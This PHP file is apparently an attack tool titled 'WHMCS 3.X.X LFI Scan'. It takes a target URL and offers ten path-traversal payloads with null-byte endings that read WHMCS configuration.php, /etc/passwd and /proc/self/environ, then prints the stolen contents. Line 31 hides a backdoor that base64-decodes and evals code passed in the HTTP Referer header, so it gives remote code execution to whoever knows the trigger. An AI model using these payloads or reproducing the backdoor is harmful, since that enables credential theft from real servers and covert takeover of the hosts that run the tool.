scan.php

1. <td height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="izo" id="izo">
2. <title>..:: WHMCS 3.X.X LFI Scan ::>></title>
3. <style type="text/css">
4.         body {
5.             background: #000000 url(http://cc2.upanh.com/26.236.33445651.bmt0/hacker3.jpg) center top no-repeat;
6.             color: #00CC00;
7.             padding: 0px;
8.             margin: 0px;
9.         }
10. </style>
11.  
12. <center>
13. <h1><font style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: bold;">..:: WHMCS 3.X.X LFI Scan Config - Code Edit By X-T::..</font></h1>
14. <form method="POST"><center>
15. <input value="http://www." type="text" name="kutucuk">
16. <select size="1" name="wht"><option>Choose Bug</option>
17. <option>/cart.php?a=test&templatefile=../../../configuration.php%00</option>
18. <option>/clientarea.php?action=red&templatefile=../../configuration.php%00</option>
19. <option>/downloads.php?action=b0x&templatefile=../../configuration.php%00</option>
20. <option>/submitticket.php?step=b0x&templatefile=../../configuration.php%00</option>
21. <option>/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00</option>
22. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
23. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
24. <option>/cart.php?a=test&templatefile=../../../../../../../../../../../../../proc/self/environ%00</option>
25. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../../../../../proc/self/environ%00</option>
26. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../../../../../proc/self/environ%00</option></select>
27. <input type="submit" value="Fuck"></center>
28. </form>
29.  
30. <?php
31. parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
32. $sayfa=$_POST['kutucuk'];
33. $sayfa1=$_POST['wht'];
34. $kaynak=file_get_contents($sayfa.$sayfa1);
35. $isle=explode('<?php',$kaynak);
36. $isle=explode('?>',$isle[1]);
37. $gol=explode('DOCUMENT_ROOT=',$kaynak);//
38. $gol=explode('<p align="center">Powered',$gol[1]);//
39. $turkg=explode('root:x:0:0:root:/root:/bin/bash',$kaynak);//
40. $turkg=explode('<p align="center">Powered',$turkg[1]);//
41. echo "<center><textarea cols='65' rows='18'>".$isle[0].$gol[0].$turkg[0]."</textarea></center>";
42. ?>